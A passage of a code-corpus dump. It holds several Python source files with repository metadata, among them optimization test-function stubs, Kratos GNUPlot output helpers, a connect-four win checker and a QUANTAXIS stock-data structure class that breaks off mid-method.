'?': 'Not predicted'} | 52.129412 | 76 | 0.610246 | 1,381 | 8,862 | 3.481535 | 0.154236 | 0.224626 | 0.389351 | 0.104825 | 0.702163 | 0.702163 | 0.702163 | 0.702163 | 0.702163 | 0.702163 | 0 | 0.490969 | 0.212819 | 8,862 | 170 | 77 | 52.129412 | 0.198251 | 0.011397 | 0 | 0.103896 | 0 | 0 | 0.644122 | 0.01131 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.006494 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
cb35bed0356701a96f225e50e3169bf0f183ba75 | 4,002 | py | Python | Numpy Vectorize/opfunctions.py | zeeshanahmad10809/ParticleSwarmOptimiza | 678f326b0d6a12641dd52af15101d5cf08e9786b | [
"Apache-2.0"
] | 4 | 2020-08-03T19:44:57.000Z | 2021-04-05T15:58:00.000Z | Numpy Vectorize/opfunctions.py | zeeshanahmad10809/ParticleSwarmOptimiza | 678f326b0d6a12641dd52af15101d5cf08e9786b | [
"Apache-2.0"
] | null | null | null | Numpy Vectorize/opfunctions.py | zeeshanahmad10809/ParticleSwarmOptimiza | 678f326b0d6a12641dd52af15101d5cf08e9786b | [
"Apache-2.0"
] | null | null | null | def sphere(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
_sum = 0.0
for _x in particle.x:
_sum = _sum + _x ** 2
return _sum
def greiwank(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def rastrigin(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def ackley(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def rosenbrock(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def schwefel(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def michalewicz(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def dejong(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def step(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def levy(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def circle(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def cosine_mixture(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
def exponential(particle):
"""
sphere is an objective function used to test
optimization algorithms.
:param particle: 1d Numpy Array of Particle
List of position of particle in all dimensions.
:return: double
Calculated value of objective function.
"""
pass
| 23.267442 | 55 | 0.665667 | 482 | 4,002 | 5.512448 | 0.093361 | 0.166353 | 0.078284 | 0.088069 | 0.945427 | 0.945427 | 0.945427 | 0.945427 | 0.945427 | 0.945427 | 0 | 0.005556 | 0.28036 | 4,002 | 171 | 56 | 23.403509 | 0.917014 | 0.737131 | 0 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.448276 | false | 0.413793 | 0 | 0 | 0.482759 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
cb405e1c5bfda93634c1503c50699e8814ee2fff | 9,277 | py | Python | applications/MultiScaleApplication/python_scripts/TK_Plot.py | lcirrott/Kratos | 8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea | [
"BSD-4-Clause"
] | null | null | null | applications/MultiScaleApplication/python_scripts/TK_Plot.py | lcirrott/Kratos | 8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea | [
"BSD-4-Clause"
] | null | null | null | applications/MultiScaleApplication/python_scripts/TK_Plot.py | lcirrott/Kratos | 8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea | [
"BSD-4-Clause"
] | null | null | null | from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
from KratosMultiphysics import *
from KratosMultiphysics.MultiScaleApplication import *
import os
import glob
class GNUPlot_Folder:
def __init__(self, Name):
self.Name = Name
def Initialize(self, Model):
if not os.path.exists(self.Name):
os.mkdir(self.Name)
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
pass
def Finalize(self, Model):
pass
class GNUPlot_Nodal:
def __init__(self,
BaseName=None,
Name=None,
VarX=None,
VarY=None,
NodeX=None,
NodeY=None,
Frequency = None,
):
self.BaseName = BaseName
self.Name = Name
self.VarX = VarX
self.VarY = VarY
self.NodeX = NodeX
self.NodeY = NodeY
self.ofile = None
self.Frequency = Frequency
self.Tn = None
def __check_write_freq(self,t):
r = True
f = self.Frequency
if(f is not None):
if(self.Tn is None):
self.Tn = t
else:
dt = t-self.Tn
if(dt >= f):
self.Tn = t
else:
r = False
return r
def Initialize(self, Model):
if not os.path.exists(self.BaseName):
os.mkdir(self.BaseName)
filename = self.BaseName + os.sep + self.Name + "_" + str(self.NodeX) + "_" + str(self.NodeY) + ".grf"
self.ofile = open(filename, "w+")
xx = Model.Nodes[self.NodeX].GetSolutionStepValue(self.VarX)
yy = Model.Nodes[self.NodeY].GetSolutionStepValue(self.VarY)
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
self.Tn = Model.ProcessInfo[TIME]
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
t = Model.ProcessInfo[TIME]
if( (t == Model.ProcessInfo[END_TIME]) or (self.__check_write_freq(t)) ):
xx = Model.Nodes[self.NodeX].GetSolutionStepValue(self.VarX)
yy = Model.Nodes[self.NodeY].GetSolutionStepValue(self.VarY)
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
def Finalize(self, Model):
self.ofile.close()
class GNUPlot_Nodal_Multiple:
def __init__(self,
BaseName=None,
Name=None,
VarX=None,
VarY=None,
NodesX=None,
NodesY=None,
FactorX=1.0,
FactorY=1.0,
XSumFactor=1.0,
YSumFactor=1.0,
Frequency = None,
):
self.BaseName = BaseName
self.Name = Name
self.VarX = VarX
self.VarY = VarY
self.NodesX = NodesX
self.NodesY = NodesY
self.FactorX = FactorX
self.FactorY = FactorY
self.ofile = None
self.XSumFactor=XSumFactor
self.YSumFactor=YSumFactor
self.Frequency = Frequency
self.Tn = None
def __check_write_freq(self,t):
r = True
f = self.Frequency
if(f is not None):
if(self.Tn is None):
self.Tn = t
else:
dt = t-self.Tn
if(dt >= f):
self.Tn = t
else:
r = False
return r
def Initialize(self, Model):
if not os.path.exists(self.BaseName):
os.mkdir(self.BaseName)
# filename = self.BaseName + os.sep + self.Name + ".grf"
filename = self.BaseName + os.sep + self.Name
self.ofile = open(filename, "w+")
sum_x = 0.0
sum_y = 0.0
x_sum_fac = self.XSumFactor
y_sum_fac = self.YSumFactor
for i in self.NodesX:
sum_x += x_sum_fac*(Model.Nodes[i].GetSolutionStepValue(self.VarX))
for i in self.NodesY:
sum_y += y_sum_fac*(Model.Nodes[i].GetSolutionStepValue(self.VarY))
self.ofile.write(str(self.FactorX*sum_x) + " " + str(self.FactorY*sum_y) + '\n')
self.ofile.flush()
self.Tn = Model.ProcessInfo[TIME]
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
t = Model.ProcessInfo[TIME]
if( (t == Model.ProcessInfo[END_TIME]) or (self.__check_write_freq(t)) ):
sum_x = 0.0
sum_y = 0.0
for i in self.NodesX:
sum_x += Model.Nodes[i].GetSolutionStepValue(self.VarX)
for i in self.NodesY:
sum_y += Model.Nodes[i].GetSolutionStepValue(self.VarY)
self.ofile.write(str(self.FactorX*sum_x) + " " + str(self.FactorY*sum_y) + '\n')
self.ofile.flush()
def Finalize(self, Model):
self.ofile.close()
class GNUPlot_Elemental:
def __init__(self,
BaseName=None,
Name=None,
VarX=None,
VarY=None,
ComponentX=None,
ComponentY=None,
ElementID=None,
GpID=None,
Frequency = None,
):
self.BaseName = BaseName
self.Name = Name
self.VarX = VarX
self.VarY = VarY
self.ElementID = ElementID
self.GpID = GpID
self.ofile = None
self.ComponentX = ComponentX
self.ComponentY = ComponentY
self.Frequency = Frequency
self.Tn = None
def __check_write_freq(self,t):
r = True
f = self.Frequency
if(f is not None):
if(self.Tn is None):
self.Tn = t
else:
dt = t-self.Tn
if(dt >= f):
self.Tn = t
else:
r = False
return r
def Initialize(self, Model):
if not os.path.exists(self.BaseName):
os.mkdir(self.BaseName)
filename = self.BaseName + os.sep + self.Name + "_" + str(self.ElementID) + "_" + str(self.GpID) + ".grf"
self.ofile = open(filename, "w+")
xx = 0.0
yy = 0.0
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
self.Tn = Model.ProcessInfo[TIME]
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
t = Model.ProcessInfo[TIME]
if( (t == Model.ProcessInfo[END_TIME]) or (self.__check_write_freq(t)) ):
allx = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(self.VarX, Model.ProcessInfo)
ally = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(self.VarY, Model.ProcessInfo)
mx = allx[self.GpID]
my = ally[self.GpID]
if self.ComponentX is None:
xx = mx
else:
xx = mx[self.ComponentX]
if self.ComponentY is None:
yy = my
else:
yy = my[self.ComponentY]
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
def Finalize(self, Model):
self.ofile.close()
class Plot_StrainVsStress:
def __init__(self,
BaseName=None,
Name=None,
Dim=None,
VarX=None,
VarY=None,
ComponentX=None,
ComponentY=None,
ElementID=None,
GpID=None,
):
self.BaseName = BaseName
self.Name = Name
self.Dim = Dim
self.VarX = VarX
self.VarY = VarY
self.ElementID = ElementID
self.GpID = GpID
self.ofile = None
self.ComponentX = ComponentX
self.ComponentY = ComponentY
def Initialize(self, Model):
if not os.path.exists(self.BaseName):
os.mkdir(self.BaseName)
filename = self.BaseName + os.sep + self.Name + "_" + str(self.ElementID) + "_" + str(self.GpID) + ".grf"
self.ofile = open(filename, "w+")
xx = 0.0
yy = 0.0
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
allx = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(self.VarX, Model.ProcessInfo)
ally = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(self.VarY, Model.ProcessInfo)
mx = allx[self.GpID]
my = ally[self.GpID]
if self.ComponentX is None:
xx = mx
else:
xx = mx[self.ComponentX]
if self.ComponentY is None:
yy = my
else:
yy = my[self.ComponentY]
self.ofile.write(str(xx) + " " + str(yy) + '\n')
self.ofile.flush()
def Finalize(self, Model):
self.ofile.close()
class GNUPlot_YieldSurf2D:
def __init__(self,
BaseName=None,
Name=None,
ElementID=None,
GpID=None,
):
self.BaseName = BaseName
self.Name = Name
self.ElementID = ElementID
self.GpID = GpID
def Initialize(self, Model):
if not os.path.exists(self.BaseName):
os.mkdir(self.BaseName)
def OnBeforeSolutionStage(self, Model):
pass
def OnSolutionStageCompleted(self, Model):
pass
def OnBeforeSolutionStep(self, Model):
pass
def OnSolutionStepCompleted(self, Model):
time = Model.ProcessInfo[TIME]
stime = str(time).replace('.','_')
filename = self.BaseName + os.sep + self.Name + "_" + stime + ".grf"
ofile = open(filename, "w+")
allx = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(YIELD_SURFACE_DATA_2D_X, Model.ProcessInfo)
ally = Model.Elements[self.ElementID].GetValuesOnIntegrationPoints(YIELD_SURFACE_DATA_2D_Y, Model.ProcessInfo)
xx = allx[self.GpID]
yy = ally[self.GpID]
for i in range(len(xx)):
x = str(xx[i])
y = str(yy[i])
ofile.write(x + " " + y + '\n')
ofile.close()
def Finalize(self, Model):
pass
| 25.277929 | 135 | 0.644174 | 1,207 | 9,277 | 4.868268 | 0.097763 | 0.05514 | 0.04646 | 0.051736 | 0.860619 | 0.848707 | 0.84292 | 0.808713 | 0.801225 | 0.776719 | 0 | 0.004333 | 0.228846 | 9,277 | 366 | 136 | 25.346995 | 0.817025 | 0.013259 | 0 | 0.83121 | 0 | 0 | 0.009105 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.143312 | false | 0.066879 | 0.015924 | 0 | 0.187898 | 0.003185 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
cb5384c54c098e8331ff368dd271874e62305972 | 58 | py | Python | src/sections/testing.py | clickthisnick/readme-generator | 504d346faac37543f859c65e2827f74a6184d7a5 | [
"MIT"
] | null | null | null | src/sections/testing.py | clickthisnick/readme-generator | 504d346faac37543f859c65e2827f74a6184d7a5 | [
"MIT"
] | null | null | null | src/sections/testing.py | clickthisnick/readme-generator | 504d346faac37543f859c65e2827f74a6184d7a5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
def generate():
return "TODO"
| 14.5 | 23 | 0.534483 | 7 | 58 | 4.428571 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022222 | 0.224138 | 58 | 3 | 24 | 19.333333 | 0.666667 | 0.362069 | 0 | 0 | 1 | 0 | 0.114286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
cbc1134e97728cfe0072add326c603b1ac1f4828 | 145 | py | Python | src/graph_transpiler/webdnn/encoder/__init__.py | steerapi/webdnn | 1df51cc094e5a528cfd3452c264905708eadb491 | [
"MIT"
] | 1 | 2021-04-09T15:55:35.000Z | 2021-04-09T15:55:35.000Z | src/graph_transpiler/webdnn/encoder/__init__.py | steerapi/webdnn | 1df51cc094e5a528cfd3452c264905708eadb491 | [
"MIT"
] | null | null | null | src/graph_transpiler/webdnn/encoder/__init__.py | steerapi/webdnn | 1df51cc094e5a528cfd3452c264905708eadb491 | [
"MIT"
] | null | null | null | from webdnn.encoder import constant_encoder
from webdnn.encoder import constant_encoder_eightbit
from webdnn.encoder import constant_encoder_raw
| 36.25 | 52 | 0.896552 | 20 | 145 | 6.25 | 0.35 | 0.24 | 0.408 | 0.552 | 0.912 | 0.912 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082759 | 145 | 3 | 53 | 48.333333 | 0.93985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
1dd2882240043f774b423adfa3ec1e6a5cb039c9 | 2,775 | py | Python | win_state.py | ajermk/connect4-with-AI | b9bb626a34868d6a333c3b159cf6ee1edbc94bd1 | [
"MIT"
] | null | null | null | win_state.py | ajermk/connect4-with-AI | b9bb626a34868d6a333c3b159cf6ee1edbc94bd1 | [
"MIT"
] | null | null | null | win_state.py | ajermk/connect4-with-AI | b9bb626a34868d6a333c3b159cf6ee1edbc94bd1 | [
"MIT"
] | null | null | null | import globals as gl
def winning_state(board, piece):
if (winning_state_hor(board,piece) or
winning_state_vert(board, piece) or
winning_state_diag1(board, piece) or
winning_state_diag2(board, piece)):
return True
def winning_state_vert(board, piece):
# check horizontal, all columns in a single row
for colum in range(gl.COLUMN_COUNT):
consecutive = 0
for rows in range(gl.ROW_COUNT):
if board[rows][colum] == piece:
consecutive += 1
else:
consecutive = 0
if consecutive == gl.WINNING_CONSECUTIVE_PIECES:
return True
return False
def winning_state_hor(board, piece):
# check vertical, all rows in a single column
for rows in range(gl.ROW_COUNT):
consecutive = 0
for colum in range(gl.COLUMN_COUNT):
if board[rows][colum] == piece:
consecutive += 1
else:
consecutive = 0
if consecutive == gl.WINNING_CONSECUTIVE_PIECES:
return True
return False
def winning_state_diag1(board, piece):
# check \
for cols in range(gl.COLUMN_COUNT):
consecutive = 0
for rows in range(gl.ROW_COUNT):
if ((cols+rows < gl.COLUMN_COUNT) and board[rows][cols+rows] == piece):
consecutive += 1
else:
consecutive = 0
if consecutive >= gl.WINNING_CONSECUTIVE_PIECES:
return True
for cols in range(gl.COLUMN_COUNT):
consecutive = 0
for rows in range(gl.ROW_COUNT):
if ((cols+rows < gl.ROW_COUNT) and board[rows+cols][rows] == piece):
consecutive += 1
else:
consecutive = 0
if consecutive >= gl.WINNING_CONSECUTIVE_PIECES:
return True
return False
def winning_state_diag2(board, piece):
# check /
for cols in range(gl.COLUMN_COUNT):
consecutive = 0
for rows in range(gl.ROW_COUNT):
if ((cols-rows >= 0) and board[rows][cols-rows] == piece):
consecutive += 1
else:
consecutive = 0
if consecutive >= gl.WINNING_CONSECUTIVE_PIECES:
return True
rows =0
cols = 0
for rows in range(gl.ROW_COUNT):
consecutive = 0
iteration = 0
for cols in range((gl.COLUMN_COUNT-1), -1, -1):
if ((rows+iteration < gl.ROW_COUNT) and board[rows+iteration][cols] == piece):
consecutive += 1
else:
consecutive = 0
if consecutive >= gl.WINNING_CONSECUTIVE_PIECES:
return True
iteration += 1
return False
| 32.647059 | 91 | 0.55964 | 326 | 2,775 | 4.628834 | 0.125767 | 0.055666 | 0.071571 | 0.059642 | 0.862823 | 0.756793 | 0.740225 | 0.701789 | 0.701127 | 0.653413 | 0 | 0.016816 | 0.357117 | 2,775 | 84 | 92 | 33.035714 | 0.829036 | 0.037838 | 0 | 0.739726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068493 | false | 0 | 0.013699 | 0 | 0.232877 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1dde623c0c7818cea1460a4af616c0541d3d182d | 39,758 | py | Python | QUANTAXIS/QAData/QADataStruct.py | paracats/QUANTAXIS | 23907d5e1398bb57f3e8d9d50c21d9fb5bfe3e86 | [
"MIT"
] | 1 | 2017-09-21T08:11:34.000Z | 2017-09-21T08:11:34.000Z | QUANTAXIS/QAData/QADataStruct.py | paracats/QUANTAXIS | 23907d5e1398bb57f3e8d9d50c21d9fb5bfe3e86 | [
"MIT"
] | null | null | null | QUANTAXIS/QAData/QADataStruct.py | paracats/QUANTAXIS | 23907d5e1398bb57f3e8d9d50c21d9fb5bfe3e86 | [
"MIT"
] | null | null | null | # coding :utf-8
"""
定义一些可以扩展的数据结构
方便序列化/相互转换
"""
import itertools
from functools import reduce
import numpy as np
import pandas as pd
import six
import talib
from QUANTAXIS.QAData.data_fq import QA_data_stock_to_fq
from QUANTAXIS.QAData.data_resample import QA_data_tick_resample
from QUANTAXIS.QAData.proto import (stock_day_pb2, # protobuf import
stock_min_pb2)
from QUANTAXIS.QAIndicator import EMA, HHV, LLV, SMA
from QUANTAXIS.QAUtil import (QA_Setting, QA_util_log_info,
QA_util_to_json_from_pandas, trade_date_sse)
class __stock_base():
def __init__(self, DataFrame):
self.data = DataFrame
self.type = ''
self.if_fq = 'bfq'
self.mongo_coll = QA_Setting.client.quantaxis
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
if 'date' in self.data.index.names.index:
self.date = self.data.index.levels[self.data.index.names.index(
'date')]
self.datetime = self.date
elif 'datetime' in self.data.index.names.index:
self.datetime = self.data.index.levels[self.data.index.names.index(
'datetime')]
self.date = self.datetime.apply(lambda x: str(x)[0:10])
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
class stock_hq_base(__stock_base):
def __init__(self, DataFrame):
self.data = DataFrame
self.type = ''
self.if_fq = 'bfq'
self.mongo_coll = QA_Setting.client.quantaxis
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
if 'date' in self.data.index.names:
self.date = self.data.index.levels[self.data.index.names.index(
'date')]
self.datetime = self.date
elif 'datetime' in self.data.index.names:
self.datetime = self.data.index.levels[self.data.index.names.index(
'datetime')]
self.date = self.data['date']
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
def len(self):
return len(self.data)
def reverse(self):
return stock_hq_base(self.data[::-1])
def show(self):
return QA_util_log_info(self.data)
def query(self, query_text):
return self.data.query(query_text)
def to_list(self):
return np.asarray(self.data).tolist()
def to_pd(self):
return self.data
def to_numpy(self):
return np.asarray(self.data)
def to_json(self):
return QA_util_to_json_from_pandas(self.data)
def sync_status(self, stock_hq_base):
'固定的状态要同步 尤其在创建新的datastruct时候'
(stock_hq_base.if_fq, stock_hq_base.type, stock_hq_base.mongo_coll) = (
self.if_fq, self.type, self.mongo_coll)
return stock_hq_base
def splits(self):
if self.type in ['stock_day', 'index_day']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['date', 'code'], drop=False)), self.code))))
elif self.type in ['stock_min','index_min']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['datetime', 'code'], drop=False)), self.code))))
def add_func(self, func, *arg, **kwargs):
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: func(
self.data[self.data['code'] == x], *arg, **kwargs), self.code)))))
def pivot(self, column_):
assert isinstance(column_, str)
try:
return self.data.pivot(index='datetime', columns='code', values=column_)
except:
return self.data.pivot(index='date', columns='code', values=column_)
def select_time(self, start, end):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(stock_hq_base(self.data[self.data['date'] >= start][self.data['date'] <= end].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(stock_hq_base(self.data[self.data['datetime'] >= start][self.data['datetime'] <= end].set_index(['datetime', 'code'], drop=False)))
def select_time_with_gap(self, time, gap, method):
if method in ['gt', '>=']:
def __gt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] > time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] > time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: __gt(x), self.splits())))))
elif method in ['gte', '>']:
def __gte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] >= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] >= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: __gte(x), self.splits())))))
elif method in ['lt', '<']:
def __lt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] < time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] < time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: __lt(x), self.splits())))))
elif method in ['lte', '<=']:
def __lte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] <= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] <= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: __lte(x), self.splits())))))
elif method in ['e', '==', '=', 'equal']:
def __eq(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] == time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] == time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(stock_hq_base(pd.concat(list(map(lambda x: __eq(x), self.splits())))))
def select_code(self, code):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(stock_hq_base(self.data[self.data['code'] == code].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(stock_hq_base(self.data[self.data['code'] == code].set_index(['datetime', 'code'], drop=False)))
def get_bar(self, code, time):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(stock_hq_base((self.data[self.data['code'] == code])[self.data['date'] == str(time)[0:10]].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(stock_hq_base((self.data[self.data['code'] == code])[self.data['datetime'] == str(time)[0:19]].set_index(['datetime', 'code'], drop=False)))
class QA_DataStruct_Index_day(stock_hq_base):
'自定义的日线数据结构'
def __init__(self, DataFrame):
self.data = DataFrame
self.type = 'index_day'
self.if_fq = ''
self.mongo_coll = QA_Setting.client.quantaxis.stock_day
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
self.date = self.data.index.levels[self.data.index.names.index('date')]
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
def len(self):
return len(self.data)
def reverse(self):
return QA_DataStruct_Index_day(self.data[::-1])
def show(self):
return QA_util_log_info(self.data)
def query(self, query_text):
return self.data.query(query_text)
def to_list(self):
return np.asarray(self.data).tolist()
def to_pd(self):
return self.data
def to_numpy(self):
return np.asarray(self.data)
def to_json(self):
return QA_util_to_json_from_pandas(self.data)
def sync_status(self, QA_DataStruct_Index_day):
'固定的状态要同步 尤其在创建新的datastruct时候'
(QA_DataStruct_Index_day.if_fq, QA_DataStruct_Index_day.type, QA_DataStruct_Index_day.mongo_coll) = (
self.if_fq, self.type, self.mongo_coll)
return QA_DataStruct_Index_day
def splits(self):
if self.type in ['stock_day', 'index_day']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['date', 'code'], drop=False)), self.code))))
elif self.type in ['stock_min','index_min']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['datetime', 'code'], drop=False)), self.code))))
def add_func(self, func, *arg, **kwargs):
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: func(
self.data[self.data['code'] == x], *arg, **kwargs), self.code)))))
def pivot(self, column_):
assert isinstance(column_, str)
try:
return self.data.pivot(index='datetime', columns='code', values=column_)
except:
return self.data.pivot(index='date', columns='code', values=column_)
def select_time(self, start, end):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_day(self.data[self.data['date'] >= start][self.data['date'] <= end].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
